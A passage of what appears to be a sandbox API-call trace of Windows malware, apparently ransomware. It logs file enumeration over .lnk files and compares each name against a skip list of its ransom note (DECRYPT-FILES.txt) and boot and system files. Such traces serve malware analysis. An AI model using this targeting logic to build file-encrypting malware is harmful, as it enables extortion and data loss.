(lpString1="ebf4.lnk", lpString2="bootsect.bak") returned 1 [0182.275] lstrcmpiW (lpString1="ebf4.lnk", lpString2="ntuser.dat.log") returned -1 [0182.275] lstrcmpiW (lpString1="ebf4.lnk", lpString2="thumbs.db") returned -1 [0182.275] lstrcmpiW (lpString1="ebf4.lnk", lpString2="Bootfont.bin") returned 1 [0182.275] lstrlenW (lpString="ebf4.lnk") returned 8 [0182.275] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0182.275] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8aeaa4b0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8aeaa4b0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8aeaa4b0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x99d, dwReserved0=0x0, dwReserved1=0x0, cFileName="eD8jo.flv.lnk", cAlternateFileName="ED8JOF~1.LNK")) returned 1 [0182.275] lstrcmpiW (lpString1="eD8jo.flv.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0182.275] lstrcmpiW (lpString1="eD8jo.flv.lnk", lpString2="autorun.inf") returned 1 [0182.275] lstrcmpiW (lpString1="eD8jo.flv.lnk", lpString2="boot.ini") returned 1 [0182.275] lstrcmpiW (lpString1="eD8jo.flv.lnk", lpString2="desktop.ini") returned 1 [0182.275] lstrcmpiW (lpString1="eD8jo.flv.lnk", lpString2="ntuser.dat") returned -1 [0182.275] lstrcmpiW (lpString1="eD8jo.flv.lnk", lpString2="iconcache.db") returned -1 [0182.275] lstrcmpiW (lpString1="eD8jo.flv.lnk", lpString2="bootsect.bak") returned 1 [0182.275] lstrcmpiW (lpString1="eD8jo.flv.lnk", lpString2="ntuser.dat.log") returned -1 [0182.275] lstrcmpiW (lpString1="eD8jo.flv.lnk", lpString2="thumbs.db") returned -1 [0182.275] lstrcmpiW (lpString1="eD8jo.flv.lnk", lpString2="Bootfont.bin") returned 1 [0182.275] lstrlenW (lpString="eD8jo.flv.lnk") returned 13 [0182.275] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0182.275] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ad799b0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8ad799b0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8ad799b0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xf7f, dwReserved0=0x0, dwReserved1=0x0, cFileName="FAus_oITOLQc.lnk", cAlternateFileName="FAUS_O~1.LNK")) returned 1 [0182.275] lstrcmpiW (lpString1="FAus_oITOLQc.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0182.275] lstrcmpiW (lpString1="FAus_oITOLQc.lnk", lpString2="autorun.inf") returned 1 [0182.276] lstrcmpiW (lpString1="FAus_oITOLQc.lnk", lpString2="boot.ini") returned 1 [0182.276] lstrcmpiW (lpString1="FAus_oITOLQc.lnk", lpString2="desktop.ini") returned 1 [0182.276] lstrcmpiW (lpString1="FAus_oITOLQc.lnk", lpString2="ntuser.dat") returned -1 [0182.276] lstrcmpiW (lpString1="FAus_oITOLQc.lnk", lpString2="iconcache.db") returned -1 [0182.276] lstrcmpiW (lpString1="FAus_oITOLQc.lnk", lpString2="bootsect.bak") returned 1 [0182.276] lstrcmpiW (lpString1="FAus_oITOLQc.lnk", lpString2="ntuser.dat.log") returned -1 [0182.276] lstrcmpiW (lpString1="FAus_oITOLQc.lnk", lpString2="thumbs.db") returned -1 [0182.276] lstrcmpiW (lpString1="FAus_oITOLQc.lnk", lpString2="Bootfont.bin") returned 1 [0182.276] lstrlenW (lpString="FAus_oITOLQc.lnk") returned 16 [0182.276] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0182.276] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ac48eb0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8ac48eb0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8ac48eb0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xe9f, dwReserved0=0x0, dwReserved1=0x0, cFileName="FcUVZVQezWKj.lnk", cAlternateFileName="FCUVZV~1.LNK")) returned 1 [0182.276] lstrcmpiW (lpString1="FcUVZVQezWKj.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0182.276] lstrcmpiW (lpString1="FcUVZVQezWKj.lnk", lpString2="autorun.inf") returned 1 [0182.276] lstrcmpiW (lpString1="FcUVZVQezWKj.lnk", lpString2="boot.ini") returned 1 [0182.276] lstrcmpiW (lpString1="FcUVZVQezWKj.lnk", lpString2="desktop.ini") returned 1 [0182.276] lstrcmpiW (lpString1="FcUVZVQezWKj.lnk", lpString2="ntuser.dat") returned -1 [0182.276] lstrcmpiW (lpString1="FcUVZVQezWKj.lnk", lpString2="iconcache.db") returned -1 [0182.276] lstrcmpiW (lpString1="FcUVZVQezWKj.lnk", lpString2="bootsect.bak") returned 1 [0182.276] lstrcmpiW (lpString1="FcUVZVQezWKj.lnk", lpString2="ntuser.dat.log") returned -1 [0182.276] lstrcmpiW (lpString1="FcUVZVQezWKj.lnk", lpString2="thumbs.db") returned -1 [0182.276] lstrcmpiW (lpString1="FcUVZVQezWKj.lnk", lpString2="Bootfont.bin") returned 1 [0182.276] lstrlenW (lpString="FcUVZVQezWKj.lnk") returned 16 [0182.276] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0182.276] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a3f41b0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8a3f41b0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8a3f41b0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x232, dwReserved0=0x0, dwReserved1=0x0, cFileName="fSI8D5g.lnk", cAlternateFileName="")) returned 1 [0182.276] lstrcmpiW (lpString1="fSI8D5g.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0182.276] lstrcmpiW (lpString1="fSI8D5g.lnk", lpString2="autorun.inf") returned 1 [0182.276] lstrcmpiW (lpString1="fSI8D5g.lnk", lpString2="boot.ini") returned 1 [0182.276] lstrcmpiW (lpString1="fSI8D5g.lnk", lpString2="desktop.ini") returned 1 [0182.276] lstrcmpiW (lpString1="fSI8D5g.lnk", lpString2="ntuser.dat") returned -1 [0182.276] lstrcmpiW (lpString1="fSI8D5g.lnk", lpString2="iconcache.db") returned -1 [0182.276] lstrcmpiW (lpString1="fSI8D5g.lnk", lpString2="bootsect.bak") returned 1 [0182.276] lstrcmpiW (lpString1="fSI8D5g.lnk", lpString2="ntuser.dat.log") returned -1 [0182.276] lstrcmpiW (lpString1="fSI8D5g.lnk", lpString2="thumbs.db") returned -1 [0182.276] lstrcmpiW (lpString1="fSI8D5g.lnk", lpString2="Bootfont.bin") returned 1 [0182.276] lstrlenW (lpString="fSI8D5g.lnk") returned 11 [0182.276] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0182.277] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8923fe10, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8aa7fe30, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8aa7fe30, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x1da, dwReserved0=0x0, dwReserved1=0x0, cFileName="ggFLb 9Aa.lnk", cAlternateFileName="GGFLB9~1.LNK")) returned 1 [0182.277] lstrcmpiW (lpString1="ggFLb 9Aa.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0182.277] lstrcmpiW (lpString1="ggFLb 9Aa.lnk", lpString2="autorun.inf") returned 1 [0182.277] lstrcmpiW (lpString1="ggFLb 9Aa.lnk", lpString2="boot.ini") returned 1 [0182.277] lstrcmpiW (lpString1="ggFLb 9Aa.lnk", lpString2="desktop.ini") returned 1 [0182.277] lstrcmpiW (lpString1="ggFLb 9Aa.lnk", lpString2="ntuser.dat") returned -1 [0182.277] lstrcmpiW (lpString1="ggFLb 9Aa.lnk", lpString2="iconcache.db") returned -1 [0182.277] lstrcmpiW (lpString1="ggFLb 9Aa.lnk", lpString2="bootsect.bak") returned 1 [0182.277] lstrcmpiW (lpString1="ggFLb 9Aa.lnk", lpString2="ntuser.dat.log") returned -1 [0182.277] lstrcmpiW (lpString1="ggFLb 9Aa.lnk", lpString2="thumbs.db") returned -1 [0182.277] lstrcmpiW (lpString1="ggFLb 9Aa.lnk", lpString2="Bootfont.bin") returned 1 [0182.277] lstrlenW (lpString="ggFLb 9Aa.lnk") returned 13 [0182.277] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0182.277] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a81e830, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8a81e830, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8a81e830, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xe43, dwReserved0=0x0, dwReserved1=0x0, cFileName="gGxu.lnk", cAlternateFileName="")) returned 1 [0182.277] lstrcmpiW (lpString1="gGxu.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0182.277] lstrcmpiW (lpString1="gGxu.lnk", lpString2="autorun.inf") returned 1 [0182.277] lstrcmpiW (lpString1="gGxu.lnk", lpString2="boot.ini") returned 1 [0182.277] lstrcmpiW (lpString1="gGxu.lnk", lpString2="desktop.ini") returned 1 [0182.277] lstrcmpiW (lpString1="gGxu.lnk", lpString2="ntuser.dat") returned -1 [0182.277] lstrcmpiW (lpString1="gGxu.lnk", lpString2="iconcache.db") returned -1 [0182.277] lstrcmpiW (lpString1="gGxu.lnk", lpString2="bootsect.bak") returned 1 [0182.277] lstrcmpiW (lpString1="gGxu.lnk", lpString2="ntuser.dat.log") returned -1 [0182.277] lstrcmpiW (lpString1="gGxu.lnk", lpString2="thumbs.db") returned -1 [0182.277] lstrcmpiW (lpString1="gGxu.lnk", lpString2="Bootfont.bin") returned 1 [0182.277] lstrlenW (lpString="gGxu.lnk") returned 8 [0182.277] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0182.277] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ace1430, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8ace1430, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8ace1430, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xfb8, dwReserved0=0x0, dwReserved1=0x0, cFileName="gtXCw8YOfxeWSlrp.lnk", cAlternateFileName="GTXCW8~1.LNK")) returned 1 [0182.277] lstrcmpiW (lpString1="gtXCw8YOfxeWSlrp.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0182.277] lstrcmpiW (lpString1="gtXCw8YOfxeWSlrp.lnk", lpString2="autorun.inf") returned 1 [0182.277] lstrcmpiW (lpString1="gtXCw8YOfxeWSlrp.lnk", lpString2="boot.ini") returned 1 [0182.277] lstrcmpiW (lpString1="gtXCw8YOfxeWSlrp.lnk", lpString2="desktop.ini") returned 1 [0182.277] lstrcmpiW (lpString1="gtXCw8YOfxeWSlrp.lnk", lpString2="ntuser.dat") returned -1 [0182.277] lstrcmpiW (lpString1="gtXCw8YOfxeWSlrp.lnk", lpString2="iconcache.db") returned -1 [0182.277] lstrcmpiW (lpString1="gtXCw8YOfxeWSlrp.lnk", lpString2="bootsect.bak") returned 1 [0182.277] lstrcmpiW (lpString1="gtXCw8YOfxeWSlrp.lnk", lpString2="ntuser.dat.log") returned -1 [0182.277] lstrcmpiW (lpString1="gtXCw8YOfxeWSlrp.lnk", lpString2="thumbs.db") returned -1 [0182.278] lstrcmpiW (lpString1="gtXCw8YOfxeWSlrp.lnk", lpString2="Bootfont.bin") returned 1 [0182.278] lstrlenW (lpString="gtXCw8YOfxeWSlrp.lnk") returned 20 [0182.278] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0182.278] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89076d90, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x89a226f0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x89a226f0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x273, dwReserved0=0x0, dwReserved1=0x0, cFileName="H1MiMyXALwnG6yS6.lnk", cAlternateFileName="H1MIMY~1.LNK")) returned 1 [0182.278] lstrcmpiW (lpString1="H1MiMyXALwnG6yS6.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0182.278] lstrcmpiW (lpString1="H1MiMyXALwnG6yS6.lnk", lpString2="autorun.inf") returned 1 [0182.278] lstrcmpiW (lpString1="H1MiMyXALwnG6yS6.lnk", lpString2="boot.ini") returned 1 [0182.278] lstrcmpiW (lpString1="H1MiMyXALwnG6yS6.lnk", lpString2="desktop.ini") returned 1 [0182.278] lstrcmpiW (lpString1="H1MiMyXALwnG6yS6.lnk", lpString2="ntuser.dat") returned -1 [0182.278] lstrcmpiW (lpString1="H1MiMyXALwnG6yS6.lnk", lpString2="iconcache.db") returned -1 [0182.278] lstrcmpiW (lpString1="H1MiMyXALwnG6yS6.lnk", lpString2="bootsect.bak") returned 1 [0182.278] lstrcmpiW (lpString1="H1MiMyXALwnG6yS6.lnk", lpString2="ntuser.dat.log") returned -1 [0182.278] lstrcmpiW (lpString1="H1MiMyXALwnG6yS6.lnk", lpString2="thumbs.db") returned -1 [0182.278] lstrcmpiW (lpString1="H1MiMyXALwnG6yS6.lnk", lpString2="Bootfont.bin") returned 1 [0182.278] lstrlenW (lpString="H1MiMyXALwnG6yS6.lnk") returned 20 [0182.278] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0182.278] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89859670, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8b131c10, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8b131c10, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xdb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="h371.lnk", cAlternateFileName="")) returned 1 [0182.278] lstrcmpiW (lpString1="h371.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0182.278] lstrcmpiW (lpString1="h371.lnk", lpString2="autorun.inf") returned 1 [0182.278] lstrcmpiW (lpString1="h371.lnk", lpString2="boot.ini") returned 1 [0182.278] lstrcmpiW (lpString1="h371.lnk", lpString2="desktop.ini") returned 1 [0182.278] lstrcmpiW (lpString1="h371.lnk", lpString2="ntuser.dat") returned -1 [0182.278] lstrcmpiW (lpString1="h371.lnk", lpString2="iconcache.db") returned -1 [0182.278] lstrcmpiW (lpString1="h371.lnk", lpString2="bootsect.bak") returned 1 [0182.278] lstrcmpiW (lpString1="h371.lnk", lpString2="ntuser.dat.log") returned -1 [0182.278] lstrcmpiW (lpString1="h371.lnk", lpString2="thumbs.db") returned -1 [0182.278] lstrcmpiW (lpString1="h371.lnk", lpString2="Bootfont.bin") returned 1 [0182.278] lstrlenW (lpString="h371.lnk") returned 8 [0182.278] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0182.278] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8adc5c70, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8adc5c70, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8adc5c70, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xa2c, dwReserved0=0x0, dwReserved1=0x0, cFileName="HJy9XqkxO.lnk", cAlternateFileName="HJY9XQ~1.LNK")) returned 1 [0182.278] lstrcmpiW (lpString1="HJy9XqkxO.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0182.278] lstrcmpiW (lpString1="HJy9XqkxO.lnk", lpString2="autorun.inf") returned 1 [0182.278] lstrcmpiW (lpString1="HJy9XqkxO.lnk", lpString2="boot.ini") returned 1 [0182.278] lstrcmpiW (lpString1="HJy9XqkxO.lnk", lpString2="desktop.ini") returned 1 [0182.278] lstrcmpiW (lpString1="HJy9XqkxO.lnk", lpString2="ntuser.dat") returned -1 [0182.278] lstrcmpiW (lpString1="HJy9XqkxO.lnk", lpString2="iconcache.db") returned -1 [0182.279] lstrcmpiW (lpString1="HJy9XqkxO.lnk", lpString2="bootsect.bak") returned 1 [0182.279] lstrcmpiW (lpString1="HJy9XqkxO.lnk", lpString2="ntuser.dat.log") returned -1 [0182.279] lstrcmpiW (lpString1="HJy9XqkxO.lnk", lpString2="thumbs.db") returned -1 [0182.279] lstrcmpiW (lpString1="HJy9XqkxO.lnk", lpString2="Bootfont.bin") returned 1 [0182.279] lstrlenW (lpString="HJy9XqkxO.lnk") returned 13 [0182.279] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0182.279] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89f0b450, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x89f0b450, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x89f0b450, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xa1a, dwReserved0=0x0, dwReserved1=0x0, cFileName="hpZUuiDNUpxuJrBS.flv.lnk", cAlternateFileName="HPZUUI~1.LNK")) returned 1 [0182.279] lstrcmpiW (lpString1="hpZUuiDNUpxuJrBS.flv.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0182.279] lstrcmpiW (lpString1="hpZUuiDNUpxuJrBS.flv.lnk", lpString2="autorun.inf") returned 1 [0182.279] lstrcmpiW (lpString1="hpZUuiDNUpxuJrBS.flv.lnk", lpString2="boot.ini") returned 1 [0182.279] lstrcmpiW (lpString1="hpZUuiDNUpxuJrBS.flv.lnk", lpString2="desktop.ini") returned 1 [0182.279] lstrcmpiW (lpString1="hpZUuiDNUpxuJrBS.flv.lnk", lpString2="ntuser.dat") returned -1 [0182.279] lstrcmpiW (lpString1="hpZUuiDNUpxuJrBS.flv.lnk", lpString2="iconcache.db") returned -1 [0182.279] lstrcmpiW (lpString1="hpZUuiDNUpxuJrBS.flv.lnk", lpString2="bootsect.bak") returned 1 [0182.279] lstrcmpiW (lpString1="hpZUuiDNUpxuJrBS.flv.lnk", lpString2="ntuser.dat.log") returned -1 [0182.279] lstrcmpiW (lpString1="hpZUuiDNUpxuJrBS.flv.lnk", lpString2="thumbs.db") returned -1 [0182.279] lstrcmpiW (lpString1="hpZUuiDNUpxuJrBS.flv.lnk", lpString2="Bootfont.bin") returned 1 [0182.280] lstrlenW (lpString="hpZUuiDNUpxuJrBS.flv.lnk") returned 24 [0182.280] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0182.280] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89b531f0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8ae11f30, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8ae11f30, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x1452, dwReserved0=0x0, dwReserved1=0x0, cFileName="hvIpcfVk.lnk", cAlternateFileName="")) returned 1 [0182.280] lstrcmpiW (lpString1="hvIpcfVk.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0182.280] lstrcmpiW (lpString1="hvIpcfVk.lnk", lpString2="autorun.inf") returned 1 [0182.280] lstrcmpiW (lpString1="hvIpcfVk.lnk", lpString2="boot.ini") returned 1 [0182.280] lstrcmpiW (lpString1="hvIpcfVk.lnk", lpString2="desktop.ini") returned 1 [0182.280] lstrcmpiW (lpString1="hvIpcfVk.lnk", lpString2="ntuser.dat") returned -1 [0182.280] lstrcmpiW (lpString1="hvIpcfVk.lnk", lpString2="iconcache.db") returned -1 [0182.280] lstrcmpiW (lpString1="hvIpcfVk.lnk", lpString2="bootsect.bak") returned 1 [0182.280] lstrcmpiW (lpString1="hvIpcfVk.lnk", lpString2="ntuser.dat.log") returned -1 [0182.280] lstrcmpiW (lpString1="hvIpcfVk.lnk", lpString2="thumbs.db") returned -1 [0182.280] lstrcmpiW (lpString1="hvIpcfVk.lnk", lpString2="Bootfont.bin") returned 1 [0182.280] lstrlenW (lpString="hvIpcfVk.lnk") returned 12 [0182.280] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0182.280] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8aed0610, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8aed0610, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8aed0610, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xa58, dwReserved0=0x0, dwReserved1=0x0, cFileName="hxLbKT0VjkKfD.lnk", cAlternateFileName="HXLBKT~1.LNK")) returned 1 [0182.280] lstrcmpiW (lpString1="hxLbKT0VjkKfD.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0182.280] lstrcmpiW (lpString1="hxLbKT0VjkKfD.lnk", lpString2="autorun.inf") returned 1 [0182.280] lstrcmpiW (lpString1="hxLbKT0VjkKfD.lnk", lpString2="boot.ini") returned 1 [0182.280] lstrcmpiW (lpString1="hxLbKT0VjkKfD.lnk", lpString2="desktop.ini") returned 1 [0182.280] lstrcmpiW (lpString1="hxLbKT0VjkKfD.lnk", lpString2="ntuser.dat") returned -1 [0182.280] lstrcmpiW (lpString1="hxLbKT0VjkKfD.lnk", lpString2="iconcache.db") returned -1 [0182.280] lstrcmpiW (lpString1="hxLbKT0VjkKfD.lnk", lpString2="bootsect.bak") returned 1 [0182.280] lstrcmpiW (lpString1="hxLbKT0VjkKfD.lnk", lpString2="ntuser.dat.log") returned -1 [0182.280] lstrcmpiW (lpString1="hxLbKT0VjkKfD.lnk", lpString2="thumbs.db") returned -1 [0182.280] lstrcmpiW (lpString1="hxLbKT0VjkKfD.lnk", lpString2="Bootfont.bin") returned 1 [0182.280] lstrlenW (lpString="hxLbKT0VjkKfD.lnk") returned 17 [0182.280] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0182.280] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8aa7fe30, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8aa7fe30, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8aa7fe30, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xf46, dwReserved0=0x0, dwReserved1=0x0, cFileName="i2GfW.lnk", cAlternateFileName="")) returned 1 [0182.280] lstrcmpiW (lpString1="i2GfW.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0182.280] lstrcmpiW (lpString1="i2GfW.lnk", lpString2="autorun.inf") returned 1 [0182.280] lstrcmpiW (lpString1="i2GfW.lnk", lpString2="boot.ini") returned 1 [0182.280] lstrcmpiW (lpString1="i2GfW.lnk", lpString2="desktop.ini") returned 1 [0182.280] lstrcmpiW (lpString1="i2GfW.lnk", lpString2="ntuser.dat") returned -1 [0182.280] lstrcmpiW (lpString1="i2GfW.lnk", lpString2="iconcache.db") returned -1 [0182.281] lstrcmpiW (lpString1="i2GfW.lnk", lpString2="bootsect.bak") returned 1 [0182.281] lstrcmpiW (lpString1="i2GfW.lnk", lpString2="ntuser.dat.log") returned -1 [0182.281] lstrcmpiW (lpString1="i2GfW.lnk", lpString2="thumbs.db") returned -1 [0182.281] lstrcmpiW (lpString1="i2GfW.lnk", lpString2="Bootfont.bin") returned 1 [0182.281] lstrlenW (lpString="i2GfW.lnk") returned 9 [0182.281] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0182.281] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a7d2570, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8b099690, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8b099690, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xf07, dwReserved0=0x0, dwReserved1=0x0, cFileName="i4ouEKS0Y1j5q3bJi.lnk", cAlternateFileName="I4OUEK~1.LNK")) returned 1 [0182.281] lstrcmpiW (lpString1="i4ouEKS0Y1j5q3bJi.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0182.281] lstrcmpiW (lpString1="i4ouEKS0Y1j5q3bJi.lnk", lpString2="autorun.inf") returned 1 [0182.281] lstrcmpiW (lpString1="i4ouEKS0Y1j5q3bJi.lnk", lpString2="boot.ini") returned 1 [0182.281] lstrcmpiW (lpString1="i4ouEKS0Y1j5q3bJi.lnk", lpString2="desktop.ini") returned 1 [0182.281] lstrcmpiW (lpString1="i4ouEKS0Y1j5q3bJi.lnk", lpString2="ntuser.dat") returned -1 [0182.281] lstrcmpiW (lpString1="i4ouEKS0Y1j5q3bJi.lnk", lpString2="iconcache.db") returned -1 [0182.281] lstrcmpiW (lpString1="i4ouEKS0Y1j5q3bJi.lnk", lpString2="bootsect.bak") returned 1 [0182.281] lstrcmpiW (lpString1="i4ouEKS0Y1j5q3bJi.lnk", lpString2="ntuser.dat.log") returned -1 [0182.281] lstrcmpiW (lpString1="i4ouEKS0Y1j5q3bJi.lnk", lpString2="thumbs.db") returned -1 [0182.281] lstrcmpiW (lpString1="i4ouEKS0Y1j5q3bJi.lnk", lpString2="Bootfont.bin") returned 1 [0182.281] lstrlenW (lpString="i4ouEKS0Y1j5q3bJi.lnk") returned 21 [0182.281] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0182.281] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8993deb0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8993deb0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8993deb0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xf37, dwReserved0=0x0, dwReserved1=0x0, cFileName="ii_H.lnk", cAlternateFileName="")) returned 1 [0182.294] lstrcmpiW (lpString1="ii_H.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0182.294] lstrcmpiW (lpString1="ii_H.lnk", lpString2="autorun.inf") returned 1 [0182.294] lstrcmpiW (lpString1="ii_H.lnk", lpString2="boot.ini") returned 1 [0182.294] lstrcmpiW (lpString1="ii_H.lnk", lpString2="desktop.ini") returned 1 [0182.294] lstrcmpiW (lpString1="ii_H.lnk", lpString2="ntuser.dat") returned -1 [0182.294] lstrcmpiW (lpString1="ii_H.lnk", lpString2="iconcache.db") returned 1 [0182.294] lstrcmpiW (lpString1="ii_H.lnk", lpString2="bootsect.bak") returned 1 